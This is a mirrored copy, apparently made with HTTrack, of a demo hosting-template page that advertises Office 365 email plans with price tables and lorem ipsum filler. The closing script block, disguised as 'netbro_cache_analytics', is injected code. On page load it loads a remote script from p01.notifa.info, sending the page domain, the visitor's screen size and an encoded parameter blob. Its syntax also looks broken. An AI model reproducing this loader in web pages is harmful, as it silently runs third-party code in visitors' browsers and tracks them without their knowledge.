<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/microsoft-office-365.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Microsoft Office 365</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li class="active"><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-inbox" aria-hidden="true"></i>
          <h1>Microsoft Office 365</h1>
          <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Prices Table Section Start ========= -->

<section class="price_table text_center">
  <div class="tabbable-panel">
    <div class="tabbable-line">
      <div class="tabs_l">
        <div class="container">
          <div class="row">
            <ul class="nav nav-tabs">
              <li class="active"><a data-toggle="tab" href="#tab_default_1">Business Plan</a></li>
              <li><a data-toggle="tab" href="#tab_default_2">Exchange Online Plan</a></li>
              <li><a data-toggle="tab" href="#tab_default_3">Large Enterprises</a></li>
              <li><a data-toggle="tab" href="#tab_default_4">Government</a></li>
            </ul>
          </div>
        </div>
      </div>
      <div class="container">
        <div class="row">
          <div class="tab-content">
            <div id="tab_default_1" class="tab-pane active">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>Business Plans Office 365</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Email Essentials</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>Business Class Email</strong> with 50 GB Inbox & Calender</li>
                      <li><strong>Online Meetings </strong> & Video Conferencing</li>
                      <li><strong>1 TB Online</strong> secure file storage and sharing</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>Office Applications </strong> - Online</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInDown" data-wow-duration=".3" data-wow-delay=".3s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Online Essentials </div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>Business Class Email</strong> with 50 GB Inbox & Calender</li>
                      <li><strong>Online Meetings </strong> & Video Conferencing</li>
                      <li><strong>1 TB Online</strong> secure file storage and sharing</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>Office Applications </strong> - Online</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Business Premium</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li><strong>Business Class Email</strong> with 50 GB Inbox & Calender</li>
                      <li><strong>Online Meetings </strong> & Video Conferencing</li>
                      <li><strong>1 TB Online</strong> secure file storage and sharing</li>
                      <li><strong>Free</strong> Domain Registration</li>
                      <li><strong>Office Applications </strong> - Online</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
            <div id="tab_default_2" class="tab-pane">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>Office 365 Exchange Online Plans</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Basic</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Large mailboxes</li>
                      <li>Anti-malware protection</li>
                      <li>Web-based access</li>
                      <li>POP support</li>
                      <li>Outlook app</li>
                      <li>Anti-malware protection</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInDown" data-wow-duration=".3" data-wow-delay=".3s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Standard</div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Large mailboxes</li>
                      <li>Anti-malware protection</li>
                      <li>Web-based access</li>
                      <li>POP support</li>
                      <li>Outlook app</li>
                      <li>Anti-malware protection</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Premium</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Large mailboxes</li>
                      <li>Anti-malware protection</li>
                      <li>Web-based access</li>
                      <li>POP support</li>
                      <li>Outlook app</li>
                      <li>Anti-malware protection</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
            <div id="tab_default_3" class="tab-pane">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>enterprises plans Microsoft Office 365</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Enterprises 1</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Office Applications</li>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings</li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Enterprises 2</div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Office Applications</li>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings</li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Enterprises 3</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Office Applications</li>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings</li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Enterprises 4</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>Office Applications</li>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings</li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
            <div id="tab_default_4" class="tab-pane">
              <div class="col-md-12 col-sm-12 col-xs-12">
                <div class="headings black_text">
                  <h6>Plan and Price</h6>
                  <h3>government plans Office 365</h3>
                  <div class="sep black_bg"></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Plan 1</div>
                    <div class="prices">$23.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings </li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $23.00/month</option>
                      <option>4 years at $23.00/month</option>
                      <option>3 years at $23.00/month</option>
                      <option>2 years at $23.00/month</option>
                      <option>1 years at $23.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Plan 2</div>
                    <div class="prices">$29.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings </li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $29.00/month</option>
                      <option>4 years at $29.00/month</option>
                      <option>3 years at $29.00/month</option>
                      <option>2 years at $29.00/month</option>
                      <option>1 years at $29.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Plan 3</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings </li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
              <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
                <div class="plan_box">
                  <div class="plan_header">
                    <div class="heading">Plan 3</div>
                    <div class="prices">$38.00<span>/month</span></div>
                  </div>
                  <div class="plan_middle">
                    <ul>
                      <li>1 TB Online</li>
                      <li>Business class email</li>
                      <li>Online meetings </li>
                      <li>Secure Intranet site</li>
                    </ul>
                  </div>
                  <div class="plan_footer">
                    <select class="select_p">
                      <option selected="selected">5 years at $38.00/month</option>
                      <option>4 years at $38.00/month</option>
                      <option>3 years at $38.00/month</option>
                      <option>2 years at $38.00/month</option>
                      <option>1 years at $38.00/month</option>
                    </select>
                    <a class="secondry_button" href="#">Order Now</a></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Prices Table Section End ========= --> 

<!-- ========= Web Hosting Features Section Start ========= -->

<section class="hosting_features">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Microsoft Office 365</h6>
          <h3>4 key things your business needs</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="features_box">
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-envelope" aria-hidden="true"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Business Email</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-comments-o" aria-hidden="true"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Online Meetings</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-share-square-o" aria-hidden="true"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">File Sharing</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-6 col-sm-12 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s">
          <div class="features_boxs">
            <div class="features_imagev"><i class="fa fa-briefcase" aria-hidden="true"></i></div>
            <div class="features_content">
              <h5 class="section_sub_heading">Office Tools</h5>
              <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Web Hosting Features Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X76cPRTbs58TAY2g7fc42xVwjCYPgQLrc8DtZGTDuu6NS%2bwpp1%2bqlcwnRTcO8xYrjJdqXOHu2tDmAf44Ce64OUv7zoOpcSJ3LuV2weP0M%2fnLXRjncroG4jpgeJXlt2vfPTajMcwSd8sVAd9cxd9UIltdehnBWwC6Hmo0K1gkdF%2b1m4zLYdmV8X3l%2bxlLjeOoiFDfQW51V%2bSOmvQ5mI6QfUczE4dXYNtXyvnQihOZqn1e0w3PeHxD%2fg5tBP9bQMG263mvXreeL80EOzxHBPWBFoIGl6p0C4m2ucJx1fekNZ0VtZeCmSnZOYbHmkUMcdvGQFOBJJ7A%2bJOR6L8EwK5qWH4Lfuq9%2bpmHqGVibOHsdQvRkdyvjPdY6uQOV%2fycP49K8BWMHJRgt6CY2wFgimjxuepU4IhTl4by%2beVeTHDBMAS5d7RYPutyIlRF0x7wazvvspXb3qPqx6kUyZ6NleIZxHiAW1RklrdfIz0S7A7tFCQsLTaR5%2fTyrW9 + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/microsoft-office-365.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>